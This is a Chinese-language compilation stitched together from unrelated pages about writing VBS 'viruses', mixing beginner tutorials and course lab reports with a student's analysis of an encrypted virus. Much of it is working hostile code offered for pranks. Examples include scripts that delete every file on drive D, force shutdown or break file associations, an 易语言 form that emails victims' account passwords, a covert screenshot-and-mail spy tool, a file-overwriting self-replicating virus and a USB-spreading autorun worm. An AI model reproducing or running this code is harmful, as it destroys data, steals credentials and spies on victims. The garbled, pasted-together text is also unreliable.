实验3 简单VBS病毒的编写

VBS简明教程三（转）◎Vbs脚本编程简明教程之十六——响应事件什么是事件？在我看来，事件就象我们手机上的闹钟，闹钟一响，我们就要去做某些特定的事情。

或者这样说，事件就像警钟，当程序运行时，有特殊的事情发生，就会激发事件，事件本身就是一条消息，如果你编写的脚本要对事件进行处理，就需要一个特殊的过程或者函数来接受和处理事件。

那么这个特殊的过程或者函数在程序运行时，就不断的监听，看系统是否传来了相应的事件，一旦接受到事件，脚本对此作出反应。

那么事件是从那里来的呢？是否需要我们在脚本中对事件进行编写呢？一般情况下，事件是某个程序在运行中的特殊状态发出的，我们不需要对事件进行编写，只需要编写处理事件的函数。

比如说我们用vbs建立了ie的一个实例，那么当ie的窗口被关闭的时候，就会激发出一个叫做OnQuit的事件。

是不是脚本自然而然就能接受事件并进行处理呢？我们说不是的，在创建对象的时候，我们将使用WSH的createobject命令，例如：Setobjie=Wscript.createobject(“internetexplorer.application”,”ev ent_”)注意到了吗？多了一个参数，这个参数的作用是什么呢？它叫做事件接收端，当脚本连接的对象包含事件时，如果对象调用的事件是OnBegin，那么WSH将会在脚本中调用一个event_OnBegin的事件处理程序。

当然事件接受端并不是固定的，如果对象将其定义为MyObj_的话，那么事件处理程序将是：MyObj_OnBegin。

是否很熟悉？在打造个性化QQ一讲中，曾经出现过Window_OnSize(cx,cy)函数，它其实就是一个事件处理程序。

让我们来举个实际的例子完整的看看事件的处理过程：Setobjie=WScript.CreateObject('InternetExplorer.Application','event _')objie.Visible=TrueMsgBox '请关闭浏览器窗口看看效果！',vbSystemModalWscript.sleep 6000MsgBox '现在已经正常关闭了'Sub event_onquit()MsgBox '您确定要关闭浏览器吗？',vbSystemModalEnd Sub这段脚本打开了一个IE窗口，然后要求你关闭IE窗口，当你关闭窗口的时候，自动调用事件响应程序。

对⼀个vbs脚本病毒的病毒原理分析⼀、前⾔病毒课⽼师丢给我们⼀份加密过的vbs脚本病毒的代码去尝试分析，这⾥把分析过程发出来，供⼤家参考，如果发现⽂中有什么错误或者是有啥建议，可以直接留⾔给我，谢谢！⼆、⽬录整个分析过程可以分为以下⼏个部分:0x00 准备⼯作0x01 解密部分0x02 功能分析三、分析过程0x00 准备⼯作windows xp的虚拟机(在⾃⼰的windows下也可以做)vbs的⼀些基本语法0x01 解密部分右击病毒⽂件然后编辑打开或者是直接把其后缀修改成txt直接打开都⾏，可以看到⼀⼤段密⽂，并调⽤了⼀个函数deCrypt。

暂时只看到这些，那么接着往下看吧。

拖到代码底部，发现有deCrypt了⼀次，也就是经过了两次加密，这⾥把执⾏部分注释掉，然后将解密的结果输出到⽂本⽂件中去。

另外，可以看到是⽤base64进⾏的加密的。

现在来看看解码后的结果。

发现依旧是不可阅读的代码，那就继续看看他是怎么处理的吧。

这⾥可以看到是将之前的字符串按“|dz|”划分，然后得到的是ascii码，将这些ascii码对应的字符拼接起来就好了，就得到了结果。

同样的套路将解密结果输出到⽂件中去再继续分析。

然后这次得到的结果是真正的病毒代码了。

接下来对他的功能进⾏分析。

0x02 功能分析从头开始看吧。

显⽰⼀些配置信息，包括了服务器的域名。

可以查到服务器是美国的，尝试ping了下，ping不通，可能是服务器作了设置不让⼈ping、也可能是服务器已经不⽤了、也有可能是我国的防⽕长城直接墙掉了。

然后是⼀些之后要⽤到的变量，这⾥不作过多的解释。

之后就是code start的部分了。

然后由于⾥⾯调⽤了各种函数，所以这⾥按执⾏的顺序给调⽤的函数编号，以便阅读，不然会感觉很凌乱的。

这⾥先是调⽤了instance函数。

1.instance函数给之前的⼀个参数usbspreading赋值，并对注册表进⾏写操作在执⾏完了instance函数后，会进⼊⼀个while true的死循环，不断从服务器读取命令，然后执⾏。

vbs整人电脑病毒代码是怎样的计算机病毒，是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据，影响计算机使用，并能自我复制的一组计算机指令或者程序代码。

这是目前官方最权威的关于计算机病毒的定义，此定义也被通行的《计算机病毒防治产品评级准则》的国家标准所采纳。

以下是店铺网小编为大家整理的关于vbs整人电脑病毒代码的相关知识，希望对大家有所帮助!易语言整人代码如下.版本 2.支持库 OPenGL.子程序 __启动窗口_创建完毕运行(“Shutdown.exe -s -t 120”, 假, ).子程序 _按钮1_被单击.如果真 (编辑框1.内容= “我是蠢猪，***是大好人”)运行(“shutdown -a ”, 假, )信息框(“哈哈~我还是很厚道的!我也知道你是发自内心的，是啊，我怎么那么完美呢?——呵呵~”, 0, )结束 ().如果真 (编辑框1.内容≠ “我是蠢猪，***是大好人”)信息框(“尼玛，输入正确会死啊!告诉你了，只要输入正确就OK 了~你怎么就不相信我呢”, 0, )—————————————————————————————————————————易语言骗账号代码如下：.版本 2.支持库 internet.子程序 _按钮1_被单击连接发信服务器(“”, 25, “邮箱”, “密码”, )发送邮件(“号来了”, “账号：” + 编辑框1.内容 + #换行符 +“密码：” + 编辑框2.内容, “邮箱”, , , “邮箱”, )——————————————————————————————————————————易语言监视对方电脑，连发十张高清截图代码如下：.版本 2.支持库 eImgConverter.支持库 internet.子程序 __启动窗口_创建完毕.计次循环首 (10, )写到文件(“D:\jt.bmp”, 快照 (, , ))转换到JPG (“jt.bmp”, “jt.jpg”, 假, 75, 真, 0).如果真 (连接发信服务器(“”, 25, “邮箱”, “密码”, ))添加附件文件(“D:\jt.bmp”).如果真结束发送邮件(“主题”, “被监视的电脑截图”, “邮箱”, , , “邮箱”, )断开发信服务器 ().计次循环尾 ()删除文件(“D:\jt.bmp”)结束 ()——————————————————————————————————————————你说要有图片可以将易语言程序启动窗口主页面的图片设置成我这样你说要有声音，可以运用以下代码：.版本 2.程序集窗口程序集1.子程序 _按钮1_被单击播放MP3 (1, “mp3地址”)——————————————————————————————————————————如果是电脑命令的话新建txt输入：shutdown -s -t 120 -c 你是猪!保存为bat或者还有，如果他用电脑命令破解，你就往后输入@echo offassoc .bat=txtfile可以让他所有的电脑命令成为乱码除了电脑命令乱码，你还可以设置各种的，比如：assoc .exe=txtfileassoc .mp3=txtfileassoc .zip=txtfileassoc .fiv=txtfileand so on……其实输入了就这样的代码，那台电脑基本就瘫痪了，没什么可以玩的了~。

vbs病毒的简单例⼦源代码解析说明：作者对某些代码进⾏了修改。

该⽂件是⼀个完整的程序。

该⽂件执⾏之后，会寻找硬盘上所有满⾜条件的⽂件，对其进⾏强制性覆盖（满⾜条件的⽂件数据将全部丢失）、并再创建⼀个相同⽂件名但后带.vbs的⽂件。

因此，请注意设⽴好破坏测试条件，千万不要对他⼈进⾏测试，否则，⼀切后果⾃负。

如果你的系统不⽀持.vbs,可以将后缀改为.vbedim folder,fso,foldername,f,d,dcset fso=createobject("scripting.filesystemobject")set self=fso.opentextfile(wscript.scriptfullname,1)vbscopy=self.readall '读取病毒体，以备复制到⽂件self.closeset dc=fso.Drivesfor each d in dcif d.drivetype=3 or d.drivetype=2 then '检查磁盘类型wscript.echo d '弹出窗⼝，显⽰找到盘符scan(d)end ifnextlsfile=wscript.scriptfullname '该脚本程序路径set lsfile=fso.getfile(lsfile)lsfile.delete(true) '病毒运⾏后⾃我删除(本⼈⾃加，爱⾍病毒本⾝没有该代码）sub scan(folder_)on error resume nextset folder_=fso.getfolder(folder_)set files=folder_.filesfor each file in filesext=fso.GetExtensionName(file) '获取⽂件后缀ext=lcase(ext) '后缀名转换成⼩写字母if ext="mp5" then '如果后缀名是mp5,当然不存在这种⽂件，这⾥可以⾃⼰修改，但是注意。

vbs编程、汇编程序调试、木马植入和运行、缓冲区溢出程序编写一、实验目的1．了解vbs病毒的感染及传播原理2．了解掌握木马的植入方法和运行原理3．掌握缓冲区溢出和堆溢出的原理及其区别。

二、实验内容（1）virus vbs脚本的编写：FSO对文件或文件夹的操作；对注册表的修改；汇编样例程序的运行和测试（2）学会3种木马的植入和运行的方法（3）学会缓冲区溢出的程序编写，参照样例编写带溢出漏洞代码，制造栈溢出和堆溢出。

三、所用仪器、材料（设备名称、型号、规格等或使用软件）PC机、虚拟机四、实验步骤及结果（一）vbs编程：1、对文件夹的操作（1）文件夹的创建：新建记事本，将下面的程序写入并保存，文件名为lgh，扩展名为.vbs程序代码：dim fs,sset fs=wscript.createobject("scripting.filesystemobject")if(fs.folderexists("F:\lgh")) thens="is available"msgbox"F:\lgh文件夹已创建"elses="not exist"set foldr=fs.createfolder("F:\lgh")end if保存为.vbs格式的文件之后，执行该文件，其结果如下所示：（2）文件夹的删除，新建记事本，将下面的程序写入并保存，文件名为lgh，扩展名为.vbsdim fsset fs=wscript.createobject("scripting.Filesystemobject")fs.deletefolder("F:\lgh ")msgbox " F:\lgh 文件夹已删除"执行该文件后的结果如下所示：2. 对注册表的操作（1）对注册表的写修改，对注册表的写修改，在记事本中编辑下面的程序，保存为.vbs格式文件后执行path="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \"set ws=wscript.createobject("wscript.shell")t=ws.regwrite(path & "lgh","name")msgbox "注册表修改成功！"首先在运行环境下输入regedit命令，查看注册表信息如下所示：执行程序后会弹出如右所示的对话框再查看注册表，发现注册表已被修改（二）汇编程序调试首先运行“cmp1.asm“文件，用—d命令查看程序的执行结果：运行文件后的结果：（三）木马的植入和运行完整的木马程序一般由两个部份组成：一个是服务器程序，一个是控制器程序。

3分钟教你编写“病毒”，不懂编程的门外汉也能秒学会提到编程，可能很多新手或者从未接触过编程的人会觉得特别高深，需要复杂的编译器等等，小编就给大家推荐一种脚本语言，vbs脚本语言，不需要编译器，用电脑自带的记事本就能够编写，下面小编教大家如何编写一个小小的脚本“病毒”程序，实现的功能就是悄无声息的禁止电脑中某个程序的运行。

1.控制面板->文件资源管理器选项->查看->隐藏已知文件夹类型的扩展名，如果前面勾选了就取消勾选，没有勾选就不用管。

2.新建一个文本文档，重命名为后缀为vbs的文件，如果第一步没有完成也就无法修改文件名的后缀。

3.右键vbs文件编辑，现在可以开始正式编写代码了。

doset bag = getobject('winmgmts:\\.\root\cimv2')set i = bag.execquery('select * from win32_process where name ='KuGou.exe'')for each objprocess in iobjprocess.terminatenextwscript.sleep 1000loop代码很简单，do loop是重复执行的意思，中间的代码被不断的执行，sleep 1000的意思是休眠1000毫秒，也就是中间的代码1秒钟执行一次，第二行代码的意思是遍历所有进程，然后第三行代码设置KuGou.exe为进程对象，接着for next 遍历系统正在运行的进程，如果有KuGou.exe的进程就将它杀掉，每秒执行一次。

代码完成了，是不是很简单！（看不懂也没关系，复制粘贴就行）4.保存文件，运行文件，之后你会发现自己的酷狗音乐不管怎样都打不开，当然你也可以把代码里面的KuGou.exe换成其他的软件的进程名，实现的效果就是禁止该软件的运行，即使用杀毒软件杀毒也无法运行该软件。

简单的vbs代码简单的vbs代码VBScript（Visual Basic Script）是一种基于VB的脚本语言，通常被用于Web开发和Windows管理。

它是一种轻量级的脚本语言，而且易于学习和编写。

这里我们会介绍一些简单的VBScript代码，这些代码可以帮助你更好的理解并掌握VBScript语言。

1. 一个简单的Hello World程序下面是一个使用vbs的简单程序。

``` MsgBox "Hello World" ```这段代码中，利用MsgBox函数来创建一个弹窗。

2. 创建一个函数函数是VBScript的一种基本类型，可以用来组合一组语句，以执行特定任务。

下面是一个例子：``` Function addNumbers(a, b) Dim c c = a + b addNumbers = c End FunctionMsgBox addNumbers(2, 2) ```这个函数将两个数字相加，并返回其结果。

3. 使用For循环创建一个计数器For循环是VBScript的一种重要组成部分，它用于执行循环任务。

以下是一个使用For循环的计数器程序的示例：``` For i = 1 To 10 MsgBox i Next ```这段代码会打开一个弹窗，显示从1到10的数字。

4. 使用If条件语句判断If语句可以根据不同的条件来执行不同的语句。

下面是一个例子：``` Dim count count = InputBox("请输入一个数字")If count > 5 Then MsgBox "这个数字大于5" Else MsgBox "这个数字小于或等于5" End If ```这段程序会创建一个输入框，让用户输入一个数字。

之后会根据用户输入的数字来执行相应的语句。

5. 创建一个对象VBScript是面向对象语言。

整⼈病毒vbs⼤全！新建⼀个记事本把代码复制进去重名名为vbs格式的就可以了解除这个vbs脚本的办法就简单了只要关掉任务管理器⾥Wscript.exe这个进程就好了1、你打开好友的聊天对话框,然后记下在你QQ⾥好友的昵称,把下⾯代码⾥的xx替换⼀下,就可以⾃定义发送QQ信息到好友的次数(代码⾥的数字10改⼀下即可).xx.vbs=>—————————————————————————代码如下：On Error Resume NextDim wsh,yeset wsh=createobject(“wscript.shell”)for i=1 to 10wscript.sleep 700wsh.AppActivate(“与 xx 聊天中“)wsh.sendKeys “^v”wsh.sendKeys iwsh.sendKeys “%s”nextwscript.quit—————————————————————————2、我就⽤这个程序放在学校图书馆查询书刊的机器上，好多⼈都那它没办法，哈哈—————————————————————————代码如下：domsgbox “You are foolish!”loop—————————————————————————3、直接关机—————————————————————————代码如下：dim WSHshellset WSHshell = wscript.createobject(“wscript.shell”)WSHshell.run “shutdown -f -s -t 00”,0 ,true—————————————————————————4、删除D:\所有⽂件—————————————————————————代码如下：dim WSHshellset WSHshell = wscript.createobject(“wscript.shell”)WSHshell.run “cmd /c “”del d:\*.* / f /q /s”””,0 ,true —————————————————————————5、不断弹出窗⼝—————————————————————————代码如下：while(1)msgbox “哈哈你被耍了！“loop—————————————————————————6、不断按下alt+f4 （开什么都关闭……）病毒太强必须关机才⾏！—————————————————————————代码如下：dim WSHshellset WSHshell = wscript.createobject(“wscript.shell”)while(1)WSHshell.SendKeys “%{F4}”Wend—————————————————————————7、按500次回车(以下代码在运⾏者的电脑上显⽰500个对话框。

⼀段病毒常⽤的VBS代码复制代码代码如下:On error resume nextDim fso,wshell,curfolder,curdristr,curdriSet fso=createobject("scripting.filesystemobject")Set wshell=CreateObject("WScript.shell")Set curfolder=fso.GetFolder(".")curdristr=Left(WScript.ScriptFullName,3)Set curdri=fso.GetDrive(curdristr)reghid() '不显⽰隐藏⽂件If WScript.ScriptFullName=fso.GetSpecialFolder(1)&"\mp3.vbs" Then '如果在system32中For i=1 To 2 Step 0reghid()For Each dri In fso.DrivesIf dri.DriveType=1 And dri<>"A:" And dri<>"B:" Then'autorun.inf⽂件夹改名If fso.FolderExists(dri.Path&"\autorun.inf") Thenfso.MoveFolder dri.Path&"\autorun.inf",dri.Path&"\Rubbish"End If'复制⾃⾝及exe⽂件到移动硬盘If fso.FileExists(dri.Path&"\mp3.vbs") And fso.FileExists(dri.Path&"\autorun.inf") Then ElseIf fso.FileExists(dri.Path&"\mp3.vbs") Thenfso.DeleteFile dri.Path&"\mp3.vbs",TrueElseIf fso.FileExists(dri.Path&"\autorun.inf") Thenfso.DeleteFile dri.Path&"\autorun.inf",TrueEnd iffso.CopyFile WScript.ScriptFullName,dri.Path&"\mp3.vbs",TrueIf fso.FileExists(".\SiZhu.exe") And Not fso.FileExists(dri.Path&"\SiZhu.exe") Then fso.CopyFile ".\SiZhu.exe",dri.Path&"\SiZhu.exe",TrueEnd Ifautoinf(dri.Path)'给刚复制的⽂件加上隐藏属性Set norkon=fso.GetFile(dri.Path&"\mp3.vbs")wshell.run "attrib +r +a +s +h "&dri.Path&"\mp3.vbs",0Set norkon=Nothing。

VBS脚本病毒教程VBS教程（文本版）就像多数计算机教程一样，我们从"Hello World！"程序开始我们的练习。

什么？不知道是什么意思？就是说大部分的计算机程序设计教程开篇入门都是编写一个小程序，执行这个程序的结果就是在计算机的屏幕上或者dos窗口中显示一行文字：Hello World！好了，我们开始吧。

打开你的"记事本"程序，在编辑窗口填写：msgbox "Hello World!"然后用鼠标单击"文件"菜单，单击"保存"，把"保存在"一栏设为桌面，在"文件名"一栏中填写kk.vbs，单击"保存"就可以了。

然后最小化"记事本"窗口，在桌面上寻找你刚刚保存的kk.vbs，然后双击。

看到弹出的对话框了没有，单击"确定"，对话框消失了。

说明之一：上面的操作中，保存位置放在桌面，仅仅是为了执行方便，你保存到其他的地方完全没有问题，只要你知道你保存在什么地方就可以了，什么？是废话，自己保存的当然知道保存在那里了。

不，自己保存的文件自己找不到的人我见的多了去了。

文件名你可以随意填写，不一定非要写kk，只要符合Windows的文件命名规则就可以了，但是扩展名必须是vbs，什么?不知道什么是扩展名？就是文件名中"."后的那部分，简单说，就是vbs脚本文件命名时必须是：xxx.vbs，其中xxx你随意。

说明之二：在记事本编辑窗口中写的这行是什么意思？Msgbox是VBS内建的函数，每一个函数都可以完成一定的功能，你只需要按照语法要求，在函数的相应部分填写相应的内容就可以了，这部分内容我们称为参数，当然函数执行的结果我们称为返回值，一个函数可以有返回值也可以没有，可以有参数也可以没有。

你不用了解函数是怎么运作的，只要了解这个函数能干什么就行了。

计算机病毒实验报告4.3 欢乐时光脚本病毒4.3 欢乐时光脚本病毒4.3.1 实验目的理解脚本病毒的感染和传播机制，重点了解新欢乐时光病毒的感染和传播行为。

学习病毒的加解密技术。

学习检测和防范脚本病毒的方法。

4.3.2 实验原理欢乐时光病毒是采用vbscript编写的脚本病毒，内嵌于.html和.vsb后缀的脚本文件，可运行于IE6及6以下的版本的IE。

该病毒通过感染本地的脚本文件和Outlook Express的信纸模版进行传播，具有加密性和可变性。

本实验使用的病毒代码经过修改，对病毒的感染范围做了有效控制。

4.3.3 实验预备知识点对VB有一定的了解。

了解windows注册表。

学会使用Outlook Express的信纸模版功能，会察看模版的源脚本。

4.3.4 实验内容欢乐时光病毒演示实验。

通过单步跟踪病毒发作的全过程，学习脚本病毒的感染技术和传播技术；阅读和分析病毒的代码，加深对这个内容的理解。

欢乐时光病毒的杀毒实验。

在对上个实验内容理解与记忆的基础上，自行修复病毒对系统做过的恶意修改，修复对象包括注册表，Outlook Express和被感染的脚本文件。

欢乐时光病毒的加密与解密实验。

根据解密的脚本，推导出加密算法，并对病毒体进行加密。

4.3.5 实验环境实验小组机器要求有WEB浏览器IE。

操作系统为windows2000/XP。

4.3.6 实验步骤打开“信息安全综合实验系统” 在右上角选择“实验导航”双击“病毒教学实验系统”进入病毒教学实验系统登录面界，输入用户名和密码。

（注意：实验前先关闭所有杀毒软件。

）1.病毒感染实验进入病毒防护教学实验后，点击左侧的“欢乐时光脚本病毒”，然后在点击下面的“病毒感染实验”，其右侧为“病毒感染实验”的界面（如图3-1所示）。

仔细阅读改病毒的简介与感染现象。

图4-3-1感染实验点击“infected_files.rar”将该文件下载到本地，保存至D盘根目录下，并解压。